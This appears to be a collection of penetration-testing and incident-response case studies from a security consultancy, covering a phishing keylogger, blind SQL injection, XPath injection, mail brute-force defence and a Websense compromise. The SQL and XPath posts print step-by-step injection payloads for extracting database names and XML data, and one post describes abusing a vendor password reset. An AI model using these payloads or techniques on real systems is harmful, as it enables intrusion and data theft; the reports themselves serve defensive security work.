The entire incident was started with an email sent from a spoofed email address fundtransferdpt@hsbc.com to the victim working in the accounts department of the company. Email contents were convincing enough for any accounts person to open the attachment. Victim was on Google Apps for the corporate emails which didn’t block the malware hidden within the attached file with .ace extension, a compressed file format like winzip. Malware filename was kept as Wire Advise_HSBC0000079652pdf.exe with a PDF icon for the file. With the default Windows settings of hiding the known extensions, the file looks like a perfect PDF document to normal user.

Before proceeding to static analysis or reverse engineering, we thought to perform a quick dynamic analysis of the malware. Although it was partially undetectable by the antivirus systems, the malware was found to be a very basic in nature without any sophisticated mechanisms involved.

On execution, malware would install itself into the system Roaming folder as can be seen from the screenshot below.

Without using any process injection or rootkit techniques to hide itself, malware can easily be seen in the task manager although the process name might trick a normal user to believe it to be a legitimate process.

Once the malware executes, it starts recording the keylogs, screenshots, browser cache and uploads the recorded data to its operator via email every 40mins.

Destination email address along with the SMTP relay address and the credentials were hard coded in the malware. Also, the destination SMTP port utilized for the data upload was 587 rather than standard port number 25, may be to bypass the firewall rules. The mail server is hosted with GoDaddy and appears to be owned by the hacker, as the SMTP relay used to upload the data is the same as MX for the destination email address.

Few of below screenshots could provide more information on attacker infrastructure, definitely doesn’t look like a professional hacker’s infrastructure.

Appears that the attacker has been into business from a while, as can be seen from this VirusTotal link and screenshot below:

Interesting part is that GoDaddy has not been able to track suspicious email traffic in its network and take down botnet CnC from its network.

Malware generates following traffic when executed on the system.

Such mechanism is not expected from a serious and sophisticated malware. In the traffic, SMTP username and password can be seen as base64 encoded strings which can easily be deciphered as can be seen below:

Similarly, password was also extracted. Due to the nature of the task, password is masked in the traffic for discouraging any misuse of the information.

Attacker doesn’t sound to be pro as is visible from the nice looking webmail interface which he is using to monitor his bots.

And its even more evident from the control panel he might be using to manage the server:

His mailbox has a lot of emails and a lot of victims:

Sample email with keylogs with some UAE business details. We have masked the details as a respect to the privacy of the victim.

A sample screenshot on a transaction can be seen from below screenshot:

Apart from this there have been numerous emails with victim’s netbanking details, credentials for social media, email and other portals.

On a concluding note, from the analysis, it appears that the attacker is more of a scammer from Nigeria (as per the domain registration records) and not a professional hacker who might be excellent in social engineering users but definitely not much into hacking.

Torrid Networks helped its client by investigating the entire case and provided them with complete report including root cause of the issue and implemented strong security controls to avoid such cyber attacks in the near future. We hope this case study should be helpful to other in knowing the unknown.

Readers may like to drop us comments/feedback at info@torridnetworks.com

The post Hackers tricking UAE companies to make payments to foreign bank accounts – A real-world case study appeared first on Torrid Networks.

Along with few common misconfigurations, some serious security issues were detected in the web application security assessment. The quick and weakest link was the admin credential used by the webmaster which was brute forced in no longer than five minutes. Apart from few other commonly found vulnerability reported, interesting part was the time based blind SQL injection which took a while to get a free drive onto the backend database.

Approach

Automated application security assessment tools have got limited space in Torrid Nework’s application security assessment methodology and most of it relies on the manual security testing of the applications. A quick automated scanning against this particular application did show few basic results those were verified against false positives and well noted. The next stage of manual security testing discovered few more vulnerabilities and also raised the probability of time based SQL injection vulnerability in the application. Data stored and being processed in the application was of very high importance and confidentiality hence SQL injection vulnerability was an eye opener.

Series of tests were performed to collect objective evidence for the presence of time based SQL injection vulnerability.

Observation

It was found that application used to generate a parameter named “suid” in response to SubmitQuery request made by the user. During the data validation testing stage, time based SQL injection payload was injected and the application responded with a positive response. Detailed observation is summarized below:

First Payload:

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27’waitfordelay’0:0:10’--

Application responded in 13.87 sec with some raw ID output on the screen.

In the next attack vector, time delay was increased to 20 sec to verify.

Second Payload:

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27’waitfordelay’0:0:20’--

Application responded in 24.23 sec with some raw ID on the screen.

Third Payload:

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27’waitfordelay’0:0:30’--

Application responded in 34.16 sec

By this time, it was evidentiary that the user supplied input is being executed at the server side and user is able to control the application behavior.

Exploitation

Time based SQL injection often requires a bit more time for exploitation in comparison to error based SQL injection which mostly is super quick to exploit. The basic approach to exploit this vulnerability is to test a condition leading to TRUE or FALSE response and on the basis of response from database, values are guessed character by character. Exploitation of this vulnerability got some really useful results which helped building a business case for the customer. Exploitation of SQL injection vulnerability is divided into smaller objectives described as below:

Objective I: To obtain database user name length

To obtain database user name, it was required to firstly guess the length of the username by sending following request to server :

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27if (len(user)=1)waitfor delay'0%3a0%3a20'—

Application responded in less than 20 sec, which meant that the condition used to test was not true. Similarly, another request with varied user length was sent to finally got a positive response for len(user)=7

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33%27if(len(user)=7)waitfor delay'0%3a0%3a20'—

Application responded after 20 sec., which concluded the condition of len(user)=7 to be true .

Objective II: To obtain username

To obtain username, it was required to guess the characters one by one. Firstly, it started with the condition to test whether the starting character used in username is in lowercase or uppercase. The crafted request to test the condition is as below:

if (ascii(lower(substring((user),1,1)))>97) WAITFOR DELAY '00:00:10'—

Application responded with a positive result.

Now, it was time to get rolling to discover the username. Following query was submitted to database via the application intreface.

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ascii(lower(substring((user),1,1)))>100)waitfor%20delay%270%3a0%3a20%27—-

The application responded before 20 sec, which meant the condition wasn’t true and the value being guessed was in fact between 97 to 100.

Similar request was again crafted but this time checking for equality condition

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ascii(lower(substring((user),1,1)))=99)waitfor%20delay%270%3a0%3a20%27--

The application responded in 24 sec suggesting the first character of username as “c”

Likewise, series of tests were performed to get second character by observing response time of the application. For the ascii value of 117, the test responded positively

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ascii(lower(substring((user),2,1)))=117)waitfor%20delay'0%3a0%3a20'--

Therefore second character was confirmed to be “u”

A series of similar tests were performed to get the complete username.

Objective III: To obtain database name length.

To exploit further, it was required to obtain the database length. Similar tests with different attack vectors lead to guess the length of the database as shown below.

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (len(db_name())=6)waitfor%20delay'00:00:20'--

Application responded in 24.82 sec concluding the database name length to be 6.

Objective IV: To obtain database name

The attack vector would definitely vary, however the approach is same as used in collecting username:

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ASCII(lower(substring((db_name()),1,1)))>108)waitfor%20delay%270%3a0%3a20%27--

Condition was true, which meant that the name’s first character is after “l”. Another test condition used was

http://www.victim.com/querysave.aspx?suid=fcd23de6-92e7-8ad1-71b99-7f998e9c8a33'if (ASCII(lower(substring((db_name()),1,1)))>116)waitfor%20delay%270%3a0%3a20%27—

Result of condition was False , the next tests were crafted to be each and every character between ‘l’ and ‘ t’ and found the positive result for ascii value 115 which is character ‘s’

http://www.victim.com/querysave.aspx?quis=f848cfe6-74d7-4a32-92d7-6c5c16e16733'if (ASCII(lower(substring((db_name()),1,1)))=115)waitfor%20delay%270%3a0%3a20%27--

And the response confirm the presence of the first character as ‘s’. Further tests, with varied payload discovered the complete database name.

Further exploitation was done to get some test records from the database as a PoC.

Conclusion:

Gathering the objective evidences collected via SQL injection and other security tests, a comprehensive report was presented to the customer. Development team was explained with mitigation techniques and a quick technical session was offered on how to avoid such security bugs in future application development and was well received by the development team.

It is recommended to implement proper data validation mechanism to validate and restrict input data from any source. Data validation is first level of defense from SQL injection attacks.

To know more, feel free to write us at info@torridnetworks.com

The post SQL Injection All Over – Application Security Assessment for a Nodal Agency appeared first on Torrid Networks.

Approach

XPATH injections are bit difficult to identify and little harder to exploit as compared to SQL injection and automated tools add more to the difficulty level further and hence the team didn’t rely upon automated tools during this test. We followed our application security methodology which preach more of manual application security testing than automated.

When the application was passed with the magic quote [‘], it responded in an unusual manner to make our analysts immediately think for presence of a typical sql injection. But soon after that a quick examination of the exception thrown at the browser with the xml document structure revealed possible presence of XPATH injection.

Exploitation

Having identified the Xpath queries on True and False behavior, the application was injected with various queries to extract data.

Extract the XML version:

There are two versions of Xpath i.e. version 1 and version 2 respectively. To detect which version is supported by the application we used lower-case() function as

‘ and lower-case(‘A’)=‘a

An error was generated to conclude that it was version 1 as it does not support lower-case() function.

The XML data is stored in tree representations and for extraction, node-by-node traversal is required.

Extract the parent node:

To extract first letter of the parent node, we injected:

‘ or substring(name(parent::*[position()=1]),1,1)= ‘a

And we got the results (i.e. True behavior) which depicted that the first letter of the parent node was ‘a’.

To extract the second letter of the parent node, we injected a series of queries:

‘ or substring(name(parent::*[position()=1]),2,1)=’a

‘ or substring(name(parent::*[position()=1]),2,1)=’b

‘ or substring(name(parent::*[position()=1]),2,1)=’c

‘ or substring(name(parent::*[position()=1]),2,1)=’d

It was confirmed that the second letter was ‘d’ as the last query generated the results (i.e. True).

Following the same procedure, we extracted the full name of the parent node, which was found to be ‘address’.

Count Nodes:

To count the number of child nodes the following query was injected

‘ and count(/*)=4 and ‘1’=‘1

This generated no error which confirmed that there were 4 child nodes. Here ‘/*’ is used to iterate through all the nodes.

Having established the name of the “address” node, we then cycled through each of its child nodes, extracting all their names and values.

By cycling through every child node of every address node, and extracting their values one character at a time, the entire contents of the XML data store was extracted.

Conclusion

After creating a detailed analysis and proof-of-concept collected via XPATH injection and other security tests, a comprehensive report was presented to the customer. Development team was explained with mitigation techniques and a quick technical session was offered on how to avoid such security bugs in future application development and was well received by the development team.

It is recommended that the user input should be checked against a white list of acceptable characters, which should ideally include only alphanumeric characters. Characters that may be used to interfere with the XPath query should be blocked, including ( ) = ‘ [ ] : , * /. Any input that does not match the white list should be rejected, not sanitized.

To know more, feel free to write us at info@torridnetworks.com

The post XPATH Injection, Telecom X-Factor – Application Security Case Study appeared first on Torrid Networks.

The Problem

Torrid Networks started off with a routine SMTP tests to check if the server was open relay, missing spoofing protection or SMTP vulnerabilities. Things were well in place and server was configured pretty neat. Next step was to check the effectiveness of anti-spam solution, which was tested by submitting recent spam samples and were caught by the anti-spam engine. We quickly arrived at a conclusion that there weren’t any configuration issues neither with Mail Transport Agent (MTA) nor with the underlying spam engine.

As obvious, the investigation went towards the log analysis of the mail server and the problem was caught within few minutes. Emails were being sent using authentic mail accounts to external users from outside IP addresses. It was clearly indicating a compromise of email passwords to launch spam from customer’s email server. Our team checked with the customer on the compromised email accounts and customer agreed on carrying default password for newly created mailboxes. Moreover, it was an open source solution based email server without any mechanism in the email server to expire the passwords or to only allow enforcement of complex passwords. In the first step, customer was advised to change the passwords for all the users whose accounts were being abused by the spammers.

Problem deepened when the investigation team found the repeating pattern of the problem and another set of mailboxes got abused in the same way as previously. Logs were picked up once again to drill it to the bottom and the second round of the analysis wasn’t a surprise, it was a brute force attack against the mail server to guess the credentials and send bulk emails after successful compromise.

The Solution

It was time to work on brute force protection against mailboxes in the server utilizing the limited resources available with the customer. Mail server software being used was postfix and it by default creates a log file for every successful and failed login attempt at /var/log/maillog in the Linux server. Analysis suggested that the brute force attack was coming from distributed IP addresses and IP ranges so it was hard to identify which IP address or range to block. Fail2ban software, a free and open source software, was identified to protect the server from brute force attacks. It checks for the failed attempts in the log files using its inbuilt database of regular expressions and creates a TCPWrapper or iptables rule to block the source IP address. Fail2ban rules were enabled to block IP addresses brute forcing for email passwords or SSH passwords with a threshold of 2 failed attempts and limit of 10hrs to keep the IP blocked.

In couple of hours it was a long list of blocked IP addresses and everything looked perfect with SPAM reduced to almost zero. However, the server was still under the close observation. After a day or so, investigation team realized that the attack was targeted one and attackers were changing the strategy to counter every protection our team was suggesting to the customer. It was revealed during the third round of investigation that now the spammers were making only single attempt from one IP address bypassing the fail2ban rule to block an IP after 2 failed attempts and moreover the IP addresses were changing rapidly as opposed to the previous round of investigation. We couldn’t suggest to block the IP after single attempt because that way even legit users could get blocked leading to Denial of Services (DoS).

We started figuring out the patterns of the IP addresses which we thought of skipping by relying simply on fail2ban just to get a clue on which way to proceed with. Team analyzed nearly 100 IP addresses from where the brute force was being attempted. All those IP addresses were found to be Chinese IP addresses. Customer was using CISCO firewall but it was outsourced to external party for management and wanted us to derive a solution on the server itself rather coordinating with firewall management team to block Chinese IP addresses.

Torrid Networks’ team quickly gathered chinese IP address ranges from the public but authentic sources and prepared a list for iptables rules. SPAM came to halt by using the combination of denying all the Chinese ranges and implementing fail2ban rules. Customer is also recommended to update the mailing solution to the latest version to enforce password policies.

Click here to download the list of Chinese IP ranges used.

The post Investigating SPAM Issues – The unauthentic way! appeared first on Torrid Networks.

Penetration Testing

Our penetration testing team requested the LAN access from the customer so that the content filtering infrastructure can be checked from inside of the LAN. On hitting one unauthorized website, our team could easily trace the IP address of the running Websense instance. Websense was installed on a Windows 2003 server along with SQL server installed on the same server to store the web access logs. During the penetration testing, we found critical remote code execution vulnerability in the Windows server which led us to the server compromise and returned meterpreter shell. We used latest BackTrack distro with metasploit framework to exploit the vulnerability.

After getting meterpreter shell, we were able to perform various tasks like creating/deleting directories, users, taking hashdump etc. We created a local user with administrator privileges to get remote desktop session so that copying data to or from Websense server becomes easy. Our penetration testing goal was to compromise Websense content filtering system, gain access to the content filtering policies and modify it, but server compromise didn’t take us to the Websense management console since the authentication credentials in Websense management console were being picked from a centralized authentication repository i.e. active directory.

Compromising Websense Management Console

Management console login appeared to be a challenging task at the first sight. From the RDP session, we identified the installation path of Websense and also located the Websense configuration file to identify the URL for the management console. Our team tried brute forcing the management console which didn’t work for us. Default username for administrator account for Websense is “websenseadministrator”. The only possible option we were left behind was to reset the “websenseadministrator” password.

To reset the password, we were required to have a registered account at www.websense.com with a valid subscription key of the product in order to reset the password. It was easy to grab the subscription key from the configuration file of Websense. However, we weren’t having any registered account at www.websense.com.

We were not having email account with the same domain name as our customer’s domain name so we assumed that the new account will not be accepted by the Websense team. Even then, we proceeded with registering the account at www.websense.com using our own domain name i.e. @torridnetworks.com along with other legitimate information. After registration, we received below email from Websense with our login details. We logged into the Websense portal but couldn’t generate the password reset key for “websenseadministrator” account since, we weren’t yet authorized by Websense to do so.

After few hours, we surprisingly received a confirmation email from Websense with the instructions to reset the password.

We logged into the websense.com portal with the newly created username and password to gain access to the customer’s product. We could escalate our privileges to super admin as displayed in the below image as well. This became possible since we were the first user to claim ourselves as “Super Admin”:

We followed the reset password instruction page, where further instructions were mentioned which required us to copy the generated key, put the key to resetPassword.txt file in the bin folder of installed Websense and then reset the WebSenseAdministrator password using WsPwdReset.exe.

We followed the said instructions and we had the admin access to Websense management console.

The Results

Our penetration testing results confirmed that compromising websense content filtering just required the operating system access. Websense has established an additional security control by allowing the administrator’s password reset from its portal but it doesn’t add any value. Problem lies in the Websense security process where Websense team doesn’t vet the created account and approves anyone who has the valid subscription key. Subscription key is not so private information since during the procurement of the product subscription key travels from OEMs, distributor, reseller to the end-customer.

The post Penetration Testing of Websense Content Filtering for Gurgaon, Delhi NCR, India based company appeared first on Torrid Networks.

Customer is from govt. sector responsible for carrying out few sensitive tasks which makes them an obvious and prime target for cyber attacks. Recently, few prominent email accounts belonging to customer received a suspicious email with a word attachment from an already compromised account within organization. Torrid was asked to perform analysis of the word document, deduce the impact of this attack, trace the origin and provide remedy.

During the analysis, it was observed in the first step that word document carries a malware payload and exploits existing vulnerability in Microsoft Word. Malware executable was packed using NsPack and was undetectable to number of antivirus software. After thorough dynamic and static analysis, a detailed report was submitted to the customer to help them understand the impact of the attack alongwith remedy towards the same. Below is the detailed report alongwith the malware payload and decompiled binaries in C and assembly language.

• Download Malware Binary
• Download Malware decompiled source code in C and assembly language

The post Malware Analysis Report for a targeted attack via word document carried out against few sensitive email accounts belonging to elite customer of Torrid appeared first on Torrid Networks.

Their global delivery model revolves around developing a sustainable competitive advantage for their client through Information Technology services across application development, deployment, maintenance and re-engineering, content & publishing services & outsourcing solutions.

The Challenge

Information stored on the servers is critical to the operation and perhaps even the survival of our client. To protect their information assets and give confidence to all their stakeholders, especially their customers they wanted to go for ISO/IEC 27001 Certification. The certification is the auditable international standard which defines the requirements for an Information Security Management System (ISMS). The standard is designed to ensure the selection of adequate and proportionate security controls

Keeping in view the importance of the IT infrastructure in their operations, the client opted to have a proactive audit and assessment study of their network before the ISO/IEC 27001 certification. Torrid was asked to do an audit at their branch offices to review the vulnerabilities in infrastructure components like operating systems (Windows Server 2003, Sun Solaris, and Linux), firewalls, routers and switches.

The Solution

Torrid’s threat research team performed a vulnerability assessment against all internally and externally accessible network infrastructures. The vulnerability assessment began with an identification of all targeted hosts within the given network ranges along with the fingerprinting of all the services running. Our team identified a number of process failures related to patch management and misconfigurations. Most of the windows and Solaris machines were found to be unpatched and highly vulnerable. By exploiting these vulnerabilities an attacker can execute arbitrary code on the remote host and can gain access to the sensitive information.

Further, our team was then able to exploit trust relationships within the DMZ which was hosting the database server and a system management client. Due to the fact that default and weak passwords were used at the homepage, it was not a tough job. This allowed the consultants to obtain administrator access to a remote system management server belonging to the client. Through exploitation of this vulnerability attacker can gain access to the organization’s main corporate domain and a number of file servers holding compliance related data in minutes. Once the thorough assessment was completed a detailed report was provided to the client, which included all the findings and their proper remediation.

The Result

Our team successfully demonstrated that the unauthorized access provided by a single poorly configured system on the Internet could provide a malicious and motivated attacker with the ability to gain full access to a vast number of corporate systems and the sensitive data stored in them from within the organization. The findings allowed our client to rectify issues within their critical servers and successfully clear the ISO/IEC 27001 certification.

As a result of the security assessment by Torrid, the client now has peace of mind that comes from an expert, third-party validation of its security policies. Its customers also trust the results of the assessment, and are investing further in leveraging the client’s solution.

The post Information Security Audit For A BPO And Knowledge Management Company appeared first on Torrid Networks.

The customer is a global financial services company, headquartered in New York City is best known for its credit card, charge card, and traveler’s cheque businesses. Following an era of international expansion, the company became an entity. It is one of the global payments company today.

Their global delivery model revolves around developing a sustainable competitive advantage for their clients through a centralized repository of client’s web based database management system which involves migration of various profiles from all the major Global Distribution System (GDS), Online Booking Tools (OBT) and other external systems.

The Challenge

Their model allows third party application to access data via a published interface. The application is capable of sending desired data to GDS (Global Distribution System) using Window services.  Application supports both types of database SQL Server as well as Oracle. The migration of data is a very critical process, as some modules are integrated by third party and various parts of application undergo routine revisions. The customer was concerned about the protection of the web based application along with the two tier thick client application, and about protecting its critical database repository against critical vulnerabilities and corresponding risks.

The Solution

1. Interaction with the development team is done to understand business requirements for the application, target customers, confidential assets and data flow of the application.

2. Objectives are defined to perform a through security assessment of web based application and thick client application.

3. Performed a web application audit and assess their application from an attacker’s perspective.

4. Our team executes various attacks against the application using commercial, open source and custom tools to determine underlying vulnerabilities in the application.
5. Manual verification and risk analysis of the findings.
6. Manual assessment of components not covered by the automated scanner, as well as any complex attack scenarios.
7. Ensuring that all the roles and privilege levels were not escalated.
8. Ensuring the proper use of cryptography for data at rest and in transit.
9. Comprehensive logging and auditability of user actions.
10. Validating user input for malicious data that could result in loss of integrity or confidentiality of data.
11. Methodology for security assessment includes, but not limited to, all the checks for the security issues identified by OWASP TOP 10 list and critical major vulnerabilities in thick client applications including unvalidated input, weak authentication method, sensitive data in memory, critical data in files & registry and impersonating a high privilege user.
12. Finally a multi-faced, multi pronged report having step by step tutorial on security best practices is handed over to them taken much care of the audience which are generally development team and managers.

The Result

The post Application Security Assessment For A Global Financial Services Company appeared first on Torrid Networks.

The Challenge

The sheer size and type of the organization made it most vulnerable for security breaches. There was need for a high level of availability, performance density, memory scalability, and investment protection therefore they implemented Hp Superdome Servers at multiple data centers distributed over different locations in India running HP-UX 11i operating systems.

The major challenges that were faced in the server infrastructure as described below:

1. Role-Based Access Control and Superuser Containment: Superuser accounts were often shared by application operators, leading to ambiguous accountability. There was no available method to restrict or delegate operators based on “who will use it”. Also it was difficult to ensure availability to different users based on time, network attributes, access methods and so on.
2. No centralized enforcement administration: There were major platform security differences that existed along with lack of remote policy administration which lead to a highly decentralized system. Decentralization pointed to lack of manageability which was a big problem for the management.
3. Unrestricted superuser: Superuser account, which have unlimited access and authority, were unrestricted making breaching a cake walk like target for hackers. Imagine one of the bad Guys in your backyard having access to your assets.
4. Inadequate auditing: Native auditing procedures were inadequate with a very low granularity level in the Operating System. Audit logs were accessible to Superusers for tampering and auditing processes could also be shut down at any time. Due to no presence of self-protecting mechanism against attacks pilferage, native logs would not be in a position to keep track of the original login and thus culprit could escape easily.
5. Consistent Cross-Platform Problems: Different platforms have different security models and for the same reason different strategies need to be used for handling the difficulties in managing various security systems which, in turn, also increase management costs.

Torrid understood the challenges faced by the customer to propose CA eTrust Access Control (AC) software that could easily mitigate the risk of different threats. eTrust AC provides capability to manage centralized access control on different servers using policy enforcement mechanism along with lots of security features.

As the servers were running highly critical government applications it was not possible to put the policies into the enforced mode from day one, so initially all the policies were planned to put in the warning mode. It was a challenge in itself to provide with the accurate completion timelines to the project due to the close monitoring required for critical application and other components before enforcing the policies.

The Solution

Torrid deployed CA’s eTrust Access Control to counter the above challenges faced by the customer. Our security experts interacted with client’s team to understand the basic design of the architecture, target customers, end users, and confidential assets to design eTrust Access Control framework and its policy model database (PMDB) for implementation which is used to distribute policies to clients from the servers.

There were a total of 12 superdome servers which were having a pool of 68 virtualized servers distributed over 4 locations in India. The pool of servers further comprised development, pre-production and production servers. It was a huge pool, so starting with the best and right framework was undoubtedly an essential pre-requisite.

The following steps were taken to implement the solution in the architecture:

1. Installation of eTrust Access Control server on a dedicated server.
2. As per requirements, a Master PMDB and its sub-group PMDB’s were installed on the eTrust Access Control server.
3. Baseline security policies were discussed with their team and enforced on the master PMDB as these policies should be on each and every host and thereafter policies on different sub group PMDB were discussed and enforced. As there were very critical production servers, so all the policies were put in the warning mode.

4. After designing the architecture of eTrust Access Control, installation and customization of the eTrust Access Control client was done on each server and subscribed to the respective PMDB.
5. Warnings on all the servers were regularly monitored for some time, discussed with their team and then put in the restrictive mode.

The Results

After analyzing the challenges, Torrid’s technical expertise helped the execution of the project and the successful implementation was rolled out in the first phase itself without second iteration. All the documentation was handed over to the client and further assistance was readily available for support and solving issues. Following benefits were reaped by the client due to the solution implementation:

1. Role-Based Access Control and Superuser Containment: By using the solution, super user privileges were fully contained and delegated. There was no back door to bypass checks and gain full control of the system or unauthorized access to files and services. In turn, operators no longer need superuser account to perform their jobs.
2. Centralized Enforcement Administration: Solution delivered a uniform level of security by bringing security up to correct level. It provided a centralized security control which allowed enterprise wide management of access enforcement and tracking with the help of Policy Model Database using a push mechanism to sequentially update the subscribers. Administrators could easily create, delete, suspend, revoke and expire user accounts centrally. They could also enforce password rules, quality, history, interval etc.
3. Data Protection: Solution helped protecting confidential and sensitive data against hacks and thefts through identity based granular access control for all files through its Host Based Intrusion Prevention feature. This delivered high service uptime as well as made resources less susceptible to attacks.
4. Secure Auditing: The solution offered a very secure, scalable and reliable means to collect and report access information – It provided secure audit logs – generated locally with possibility of being collected centrally.
5. Consistent Security Policies: CA eTrust Access Control provided consistent security policy across all the HP-UX partitions.

The post Implementation of CA eTrust Access Control For Government of India appeared first on Torrid Networks.

The new technology will be able to send accurate data to a computerized billing system up to four times a day and will largely eliminate the need for estimated bills.  Since it is an automated system, it also eliminates the need for a system to be installed at customer properties. Entire system Information is available on the portal. Portal also segregates different views for anonymous, registered, administrators and super administrators.

The Challenge

As the portal contains confidential information of about 8,26,000 account holders, there was a need to secure such information from cyber attacks and also to ensure that information is available as per the access policies. Safe-guarding information assets in the application were on top priority as the application is internet facing.

Our client was determined to protect itself from the major data breaches that have been reported from major government firms in recent memory. Since there are various modules that are integrated by third party and also many parts of the application underwent routine revisions, the customer was concerned not only about the protection of the initial applications, but also about protecting its database against new vulnerabilities that could be introduced over time. Client also wanted to shorten application development cycles while implementing safe coding practices. In addition, they also understood that the combination of its custom web applications, thousands of users, and integration of different modules was going to present a significant number of opportunities for insider threats and external attacks. They needed a solution that encompasses all their needs not burdening their project management aspects.

The Solution

Torrid recommended manual security code review followed by a comprehensive application security assessment through the expertise of its Information Security Center of Excellence. Code review, considered to be the single-most effective technique for identifying security flaws, when combined together with security assessment, can significantly increase the cost effectiveness of an application security verification effort through the concept of bundling. Integration of security code review into the System Development Life Cycle (SDLC) increases the overall quality of the code developed without adding to the efforts significantly.

Following steps were carried out for the in-depth analysis of application and performing by Torrid’s experts:

1. Interaction with the development team to understand business requirements for the application, target customers, confidential assets and data flow of the application to perform the assessment in a better way.
2. Security Code Review objectives are defined and a preliminary scan done with multiple automated tools to block all the loopholes present.
3. Manual Code Review is performed for security issues which are unique to the application architecture to fill unique gaps in application security framework.
4. Performed a web application audit and assess their application from an attacker’s perspective. “Think like they think while breaking in” approach helped us in finding many flaws that were pinned and plugged.
5. Executed numerous attacks against the application through commercial, open source and customized tools in order to determine the underlying vulnerabilities in the application.
6. Methodology for security assessment includes, but not limited to, all the checks for the security issues identified by OWASP TOP 10 list and many more.
7. Finally a multi-faced, multi pronged report having step by step tutorial on security best practices is handed over to them taken much care of the audience which are generally development team and managers.

The Results

Torrid helped them in assessing their overall security posture, strengthening their SDLC and mitigating the over all risks posed due to insecure code.

1. Achieved end to end application data security without impacting performance
   Enabled protection for high volume of users, multiple web based, custom applications and databases – without extra coding.

The post Code Review and Web Application Security Assessment For a US State Department appeared first on Torrid Networks.